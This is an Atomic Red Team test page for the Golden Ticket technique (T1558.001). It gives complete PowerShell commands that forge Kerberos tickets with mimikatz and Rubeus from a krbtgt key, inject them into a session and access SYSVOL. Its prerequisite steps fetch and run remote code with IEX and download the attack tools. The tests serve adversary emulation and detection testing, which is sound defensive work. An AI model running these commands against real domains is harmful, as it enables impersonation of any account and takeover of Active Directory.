Skip to content
Atomic Red Team
atomics
T1558.001

T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket

Description from ATT&CK (opens in a new tab)

Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection)

Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)

The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using OS Credential Dumping (opens in a new tab) and privileged access to a domain controller.

Atomic Tests


Atomic Test #1 - Crafting Active Directory golden tickets with mimikatz

Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain. This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.

Supported Platforms: Windows

auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af

Inputs:

NameDescriptionTypeDefault Value
domain_sidSID of the targeted domain, if you keep default it will automatically get the current domain SIDstringS-1-5-21-DEFAULT
domainTargeted Active Directory domain FQDNstring%userdnsdomain%
accountAccount to impersonatestringgoldenticketfakeuser
krbtgt_aes256_keyKrbtgt AES256 key (you will need to set to match your krbtgt key for your domain)stringb7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
mimikatz_pathMimikatz windows executablepathPathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe

Attack Commands: Run with powershell!

Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
 
# get current domain SID if default was used
$domain_sid = "#{domain_sid}"
If ($domain_sid -Match "DEFAULT") {
  # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60
  $domain = gwmi Win32_ComputerSystem | Select -Expand Domain
  $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value
  $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))
}
 
# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\golden.txt 2>&1 (
  echo Purge existing tickets and create golden ticket:
  klist purge
  #{mimikatz_path} "kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt" "exit"
 
  echo.
  echo Requesting SYSVOL:
  dir \\#{domain}\SYSVOL
  
  echo.
  echo Tickets after requesting SYSVOL:
  klist
 
  echo.
  echo End of Golden Ticket attack
)
"@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat
 
# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null
 
# wait until the output file has logged the entire attack
do {
  Start-Sleep 1 # wait a bit so the output file has time to be created
  Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object {
    if ($_ -match 'End of Golden Ticket attack') { break } 
  }
} while ($false) # dummy loop so that 'break' can be used
 
# show output from new empty session
Get-Content $env:TEMP\golden.txt
 
# cleanup temp files
Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
Check Prereq Commands:
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
Get Prereq Commands:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo #{mimikatz_path}
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath


Atomic Test #2 - Crafting Active Directory golden tickets with Rubeus

Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain. This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.

Supported Platforms: Windows

auto_generated_guid: e42d33cd-205c-4acf-ab59-a9f38f6bad9c

Inputs:

NameDescriptionTypeDefault Value
domaincontrollerTargeted Active Directory domain FQDNstring$ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain"
accountAccount to impersonatestring$ENV:username
krbtgt_aes256_keyKrbtgt AES256 key (you will need to set to match your krbtgt key for your domain)stringb7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
local_folderLocal path of Rubeus executablepath$Env:temp
local_executablename of the rubeus executablestringrubeus.exe
rubeus_urlURL of Rubeus executableurlhttps://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe (opens in a new tab)

Attack Commands: Run with powershell!

Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
 
cmd.exe /c "#{local_folder}\#{local_executable}" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden
$filename = (Get-ChildItem | ? {$_.Name.startswith("golden_")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name
 
# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\golden.txt 2>&1 (
  echo Purge existing tickets and create golden ticket:
  klist purge
  cd %temp%
  "#{local_folder}\#{local_executable}" ptt /ticket:kirbifile
 
  echo.
  echo Requesting SYSVOL:
  dir \\$(#{domaincontroller})\SYSVOL
  
  echo.
  echo Tickets after requesting SYSVOL:
  klist
 
  echo.
  echo End of Golden Ticket attack
)
"@ -Replace "kirbifile", $filename | Out-File -Encoding OEM $env:TEMP\golden.bat
 
# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null
 
# wait until the output file has logged the entire attack
do {
  Start-Sleep 1 # wait a bit so the output file has time to be created
  Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object {
    if ($_ -match 'End of Golden Ticket attack') { break } 
  }
} while ($false) # dummy loop so that 'break' can be used
 
# show output from new empty session
Get-Content $env:TEMP\golden.txt
 
# cleanup temp files
Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Computer must be domain joined
Check Prereq Commands:
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
Get Prereq Commands:
Write-Host Joining this computer to a domain must be done manually
Description: Rubeus must exist
Check Prereq Commands:
if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
Get Prereq Commands:
Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}